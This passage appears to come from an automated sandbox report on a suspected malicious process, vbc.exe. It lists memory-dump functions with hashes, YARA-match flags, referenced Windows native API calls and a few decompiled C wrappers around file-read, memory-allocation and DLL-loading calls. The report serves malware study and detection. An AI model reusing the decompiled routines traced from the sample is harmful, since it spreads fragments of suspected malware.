Source File: 00000004.00000002.2160544586.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Similarity

API ID:
String ID: 9
API String ID: 0-2366072709
Opcode ID: 6ebe53ff01d2fbdcbf373d671e0895d90491380ebcb0d0b29558174e34675843
Instruction ID: 3e20498a9263b1e48e84e72b8e913b4dc5f2dda4f66e7ea2f1a752bb052f83dd
Opcode Fuzzy Hash: 6ebe53ff01d2fbdcbf373d671e0895d90491380ebcb0d0b29558174e34675843
Instruction Fuzzy Hash: 209190B1E0062D8BDB64DF29CE4578ABBF5BF89300F0141E5D24CA6206E7319E958F06

Uniqueness

Uniqueness Score: -1.00%

Function 00454FCF, Relevance: 1.4, Strings: 1, Instructions: 149COMMON

Download Yara Rule

Strings

@2Dm, xrefs: 004551DD

Memory Dump Source

Source File: 00000004.00000002.2160544586.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Similarity

API ID:
String ID: @2Dm
API String ID: 0-984162619
Opcode ID: 7c99fc1e40023e593156e8ed2fc7812f04bac2879084dce3660f587d0a0cf568
Instruction ID: 5c2bf908b045d02dc92ffba136946eca7a6cdffa977b27f8a49a39b55b2f58ff
Opcode Fuzzy Hash: 7c99fc1e40023e593156e8ed2fc7812f04bac2879084dce3660f587d0a0cf568
Instruction Fuzzy Hash: 39516DB09006488FD746EFBAD895AEE7BFBAB84304F14C929D1089B364DF745905CB42

Uniqueness

Uniqueness Score: -1.00%

Function 00454FE0, Relevance: 1.4, Strings: 1, Instructions: 144COMMON

Download Yara Rule

Strings

@2Dm, xrefs: 004551DD

Memory Dump Source

Source File: 00000004.00000002.2160544586.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Similarity

API ID:
String ID: @2Dm
API String ID: 0-984162619
Opcode ID: 286e828ce3ac438d18ba61506aa7f1b720d65ac88fabb8b6b396df827538561f
Instruction ID: 3c9e23aa141014e9ba357509b5e12a2a81e0067c7a7f9ce2341d52f0435952e3
Opcode Fuzzy Hash: 286e828ce3ac438d18ba61506aa7f1b720d65ac88fabb8b6b396df827538561f
Instruction Fuzzy Hash: 4E514CB49006488FD74AEFBAD895AAE7BFBAB84304F14C929D1089F364DF745905CB81

Uniqueness

Uniqueness Score: -1.00%

Function 0045CC58, Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2160544586.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bacffe1432451165aab3ee270dbfa300924d8775604729e22bd8e331b332c4fe
Instruction ID: 1d9f09fd6e7d150889333394048e4956f4dfe6f734ad9ff2a80d984b89b04a1c
Opcode Fuzzy Hash: bacffe1432451165aab3ee270dbfa300924d8775604729e22bd8e331b332c4fe
Instruction Fuzzy Hash: 2741F574E002099FDB04CFA9CD415A9BBB1AB88302B64C8B7C81ADB311E73CD60A9F44

Uniqueness

Uniqueness Score: -1.00%

Function 00455220, Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2160544586.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4fd0fc1c2d24d28b8fd909780669bb8d11098d51805366d27b87c3300ef1778
Instruction ID: dc52c47311283570632e74546a57d6c0bf8ed7af9051353d5c39ef77a5fdd048
Opcode Fuzzy Hash: c4fd0fc1c2d24d28b8fd909780669bb8d11098d51805366d27b87c3300ef1778
Instruction Fuzzy Hash: 934184B1E056588BEB5CCF678D4069AFAF3AFC9301F14C1BAC90CAB215DB7049868F55

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: vbc.exe PID: 2608 Parent PID: 2300 vbc.exeCOMMON

Executed Functions

Function 00419E4B, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(2MA,5EB6522D,FFFFFFFF,004149F1,?,?,2MA,?,004149F1,FFFFFFFF,5EB6522D,00414D32,?,00000000), ref: 00419E45

Strings

2MA, xrefs: 00419E22, 00419E30
2MA, xrefs: 00419E3D, 00419E44

Memory Dump Source

Source File: 00000005.00000002.2192765767.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: 2MA$2MA
API String ID: 2738559852-947276439
Opcode ID: 3634b11253fdd14103bfded4acbcb9f9c892439e8bdadd08714f6b90953b3e21
Instruction ID: 8c32b6a773e974be2d83541910c2928bb5b234720ce11cefcaacbc6fab0912a0
Opcode Fuzzy Hash: 3634b11253fdd14103bfded4acbcb9f9c892439e8bdadd08714f6b90953b3e21
Instruction Fuzzy Hash: 3A0125B2200104ABCB04DF99CC91DEB7BACEF8C314F05864AFA1C97241C630E9518BE0

Uniqueness

Uniqueness Score: -1.00%

Function 00419DFA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(2MA,5EB6522D,FFFFFFFF,004149F1,?,?,2MA,?,004149F1,FFFFFFFF,5EB6522D,00414D32,?,00000000), ref: 00419E45

Strings

2MA, xrefs: 00419E22, 00419E30
2MA, xrefs: 00419E3D, 00419E44

Memory Dump Source

Source File: 00000005.00000002.2192765767.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: 2MA$2MA
API String ID: 2738559852-947276439
Opcode ID: 5849f9594f08781742c1fec161881e491efc356eebc2daf21fed98e4ca02dbbc
Instruction ID: d4a04e8435a43ddd63bc6636f4d98e4173158a91039720b869e3cd3d9b714d93
Opcode Fuzzy Hash: 5849f9594f08781742c1fec161881e491efc356eebc2daf21fed98e4ca02dbbc
Instruction Fuzzy Hash: F1F0F9B6210108AFCB04DF89CC85EEB77A9AF8C754F018649BA1D97241C630E851CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00419E00, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(2MA,5EB6522D,FFFFFFFF,004149F1,?,?,2MA,?,004149F1,FFFFFFFF,5EB6522D,00414D32,?,00000000), ref: 00419E45

Strings

2MA, xrefs: 00419E22, 00419E30
2MA, xrefs: 00419E3D, 00419E44

Memory Dump Source

Source File: 00000005.00000002.2192765767.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: 2MA$2MA
API String ID: 2738559852-947276439
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: e2eeafcdabc96c90d19f56ab9cfe9238ee24689222a5818d11d4b5cf4f7c0d6d
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: 90F0B7B2210208AFCB14DF89DC91EEB77ADEF8C754F158649BE1D97241D630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00419D4A, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00409CC3,?,wKA,00409CC3,FFFFFFFF,?,?,FFFFFFFF,00409CC3,00414B77,?,00409CC3,00000060,00000000,00000000), ref: 00419D9D

Strings

wKA, xrefs: 00419D89, 00419D94

Memory Dump Source

Source File: 00000005.00000002.2192765767.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID: wKA
API String ID: 823142352-3165208591
Opcode ID: c8499552cd11c8d086122647465828dc19da199b1d0c05bc3df0e0b2eada94b6
Instruction ID: 2c03fdad8d86b097c59aec2737737e4a79cf0f239827d133bed74f1669c60401
Opcode Fuzzy Hash: c8499552cd11c8d086122647465828dc19da199b1d0c05bc3df0e0b2eada94b6
Instruction Fuzzy Hash: 541106B2204209AFCB08DF98DC91DEB77A9AF8C314F15864DFA5D97241D634EC61CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00419D50, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00409CC3,?,wKA,00409CC3,FFFFFFFF,?,?,FFFFFFFF,00409CC3,00414B77,?,00409CC3,00000060,00000000,00000000), ref: 00419D9D

Strings

wKA, xrefs: 00419D89, 00419D94

Memory Dump Source

Source File: 00000005.00000002.2192765767.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID: wKA
API String ID: 823142352-3165208591
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 0d977cd1f4fbd36c9bd444ef8f6a04c43f7f15de33bda2cf86b45a3658e1eede
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: BFF0BDB2211208AFCB08CF89DC95EEB77ADAF8C754F158248BA1D97241C630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACC0, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040ACC0(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041C640( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041CA60(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041CCE0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041AE90(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}

0x0040acdc
0x0040acdf
0x0040ace4
0x0040ace9
0x0040acf3
0x0040acf8
0x0040acfb
0x0040acfd
0x0040ad05
0x0040ad0a
0x0040ad0a
0x0040ad11
0x0040ad19
0x0040ad1c
0x0040ad1e
0x0040ad32
0x00000000
0x0040ad34
0x0040ad3a
0x0040acee
0x0040acee
0x0040acee

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD32

Memory Dump Source

Source File: 00000005.00000002.2192765767.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
Instruction ID: 8d9c8c5cc187846e167d7fc499b748faaade23025a89af1130ee390205ce80a6
Opcode Fuzzy Hash: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
Instruction Fuzzy Hash: C40152B5D4020DA7DB10DBE5DC42FDEB7789F14308F0041AAE908A7281F634EB54C795

Uniqueness

Uniqueness Score: -1.00%

Function 00419F2B, Relevance: 1.5, APIs: 1, Instructions: 33
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00419F2B(intOrPtr __eax, void* __eflags, intOrPtr _a4, void* _a12, PVOID* _a16, long _a20, long* _a24, long _a28, long _a32) {
				long _t14;
				intOrPtr _t15;
				void* _t21;
				void* _t22;

				_t10 = __eax;
				asm("popad");
				asm("in al, dx");
				if(__eflags > 0) {
					 *0x8bec8b55 = __eax;
					_t10 = _a4;
					_t15 =  *((intOrPtr*)(_t10 + 0x10));
				}
				_t3 = _t10 + 0xc60; // 0xca0
				E0041A950(_t21, _t10, _t3, _t15, 0, 0x30, _t22);
				_t14 = NtAllocateVirtualMemory(_a12, _a16, _a20, _a24, _a28, _a32); // executed
				return _t14;
			}

0x00419f2b
0x00419f2b
0x00419f2c
0x00419f2d
0x00419f2f
0x00419f33
0x00419f36
0x00419f36
0x00419f3f
0x00419f47
0x00419f69
0x00419f6d

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB24,?,00000000,?,00003000,00000040,00000000,00000000,00409CC3), ref: 00419F69

Memory Dump Source

Source File: 00000005.00000002.2192765767.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 7d1ac7ea5e1ee10440e3f2fdeeedba387a41ccbbb03119f7c6c80820ded3b614
Instruction ID: 0ae78175b163730f311e04e7a6e94c5ebf89977c260b93ff93ffa72c953703be
Opcode Fuzzy Hash: 7d1ac7ea5e1ee10440e3f2fdeeedba387a41ccbbb03119f7c6c80820ded3b614
Instruction Fuzzy Hash: 7AF0E2B1250144AFCB10DF98DC85EE77BACEF88310F10865EF91C97202C234D851CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00419F30, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00419F30(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				intOrPtr _t10;
				long _t14;
				intOrPtr _t15;
				void* _t21;
				void* _t22;

				_t10 = _a4;
				_t15 =  *((intOrPtr*)(_t10 + 0x10));
				_t3 = _t10 + 0xc60; // 0xca0
				E0041A950(_t21, _t10, _t3, _t15, 0, 0x30, _t22);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}

0x00419f33
0x00419f36
0x00419f3f
0x00419f47
0x00419f69
0x00419f6d

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB24,?,00000000,?,00003000,00000040,00000000,00000000,00409CC3), ref: 00419F69

Memory Dump Source

Source File: 00000005.00000002.2192765767.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: c2721ea4e084a79d388e091216dcc94a475298a8aa449db6134383b78daf1f40
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: 7DF015B2210208AFCB14DF89CC81EEB77ADAF88754F118549BE1897241C630F810CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00419E7A, Relevance: 1.5, APIs: 1, Instructions: 21
nativeCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E00419E7A(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;
				void* _t12;

				asm("aas");
				0x55534717();
				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a913
				E0041A950(_t11, _a4, _t3,  *_t2, 0, 0x2c, _t12);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}

0x00419e7a
0x00419e7b
0x00419e83
0x00419e86
0x00419e8f
0x00419e97
0x00419ea5
0x00419ea9

APIs

NtClose.NTDLL(00414D10,?,?,00414D10,00409CC3,FFFFFFFF), ref: 00419EA5

Memory Dump Source

Source File: 00000005.00000002.2192765767.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: d636d7988fb78b452f88fa13df8414a364d620349843997e0bf683fa4c588a9f
Instruction ID: d48fb427290e1a701454df81f7dd9493c5d3305e5fadaa35b0621f65a10253ba
Opcode Fuzzy Hash: d636d7988fb78b452f88fa13df8414a364d620349843997e0bf683fa4c588a9f
Instruction Fuzzy Hash: F1E0C275200200AFD710EFD4CC46EEB3B58EF44320F01449ABA1C5B242C530EA0087D0

Uniqueness

Uniqueness Score: -1.00%

Function 00419E80, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00414D10,?,?,00414D10,00409CC3,FFFFFFFF), ref: 00419EA5

Memory Dump Source

Source File: 00000005.00000002.2192765767.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: abd226b249efdbe90954a2e5a1f5a103ee35f8531edac2b51595525400ebd06d
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: FED01776200214ABD710EB99CC86EE77BACEF48760F15449ABA5C9B242C530FA5086E0

Uniqueness

Uniqueness Score: -1.00%

Function 00E000C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00E000CF

Memory Dump Source

Source File: 00000005.00000002.2192980870.0000000000DF0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Associated: 00000005.00000002.2192976975.0000000000DE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193038356.0000000000ED0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193042325.0000000000EE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193046369.0000000000EE4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193050264.0000000000EE7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193053891.0000000000EF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193079843.0000000000F50000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846

Uniqueness

Uniqueness Score: -1.00%

Function 00E00078, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00E00086

Memory Dump Source

Source File: 00000005.00000002.2192980870.0000000000DF0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Associated: 00000005.00000002.2192976975.0000000000DE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193038356.0000000000ED0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193042325.0000000000EE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193046369.0000000000EE4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193050264.0000000000EE7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193053891.0000000000EF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193079843.0000000000F50000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B

Uniqueness

Uniqueness Score: -1.00%

Function 00E00048, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00E00053

Memory Dump Source

Source File: 00000005.00000002.2192980870.0000000000DF0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Associated: 00000005.00000002.2192976975.0000000000DE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193038356.0000000000ED0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193042325.0000000000EE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193046369.0000000000EE4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193050264.0000000000EE7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193053891.0000000000EF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193079843.0000000000F50000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A

Uniqueness

Uniqueness Score: -1.00%

Function 00DFF9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00DFF9FB

Memory Dump Source

Source File: 00000005.00000002.2192980870.0000000000DF0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Associated: 00000005.00000002.2192976975.0000000000DE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193038356.0000000000ED0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193042325.0000000000EE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193046369.0000000000EE4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193050264.0000000000EE7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193053891.0000000000EF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193079843.0000000000F50000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A

Uniqueness

Uniqueness Score: -1.00%

Function 00DFF900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00DFF90E

Memory Dump Source

Source File: 00000005.00000002.2192980870.0000000000DF0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Associated: 00000005.00000002.2192976975.0000000000DE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193038356.0000000000ED0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193042325.0000000000EE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193046369.0000000000EE4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193050264.0000000000EE7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193053891.0000000000EF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193079843.0000000000F50000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587

Uniqueness

Uniqueness Score: -1.00%

Function 00DFFAD0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00DFFADB

Memory Dump Source

Source File: 00000005.00000002.2192980870.0000000000DF0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Associated: 00000005.00000002.2192976975.0000000000DE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193038356.0000000000ED0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193042325.0000000000EE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193046369.0000000000EE4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193050264.0000000000EE7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193053891.0000000000EF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193079843.0000000000F50000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986

Uniqueness

Uniqueness Score: -1.00%

Function 00DFFAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00DFFAF3

Memory Dump Source

Source File: 00000005.00000002.2192980870.0000000000DF0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Associated: 00000005.00000002.2192976975.0000000000DE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193038356.0000000000ED0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193042325.0000000000EE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193046369.0000000000EE4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193050264.0000000000EE7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193053891.0000000000EF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193079843.0000000000F50000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456

Uniqueness

Uniqueness Score: -1.00%

Function 00DFFBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00DFFBC3

Memory Dump Source

Source File: 00000005.00000002.2192980870.0000000000DF0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Associated: 00000005.00000002.2192976975.0000000000DE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193038356.0000000000ED0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193042325.0000000000EE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193046369.0000000000EE4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193050264.0000000000EE7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193053891.0000000000EF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193079843.0000000000F50000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A

Uniqueness

Uniqueness Score: -1.00%

Function 00DFFB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00DFFB73

Memory Dump Source

Source File: 00000005.00000002.2192980870.0000000000DF0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Associated: 00000005.00000002.2192976975.0000000000DE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193038356.0000000000ED0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193042325.0000000000EE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193046369.0000000000EE4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193050264.0000000000EE7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193053891.0000000000EF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193079843.0000000000F50000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
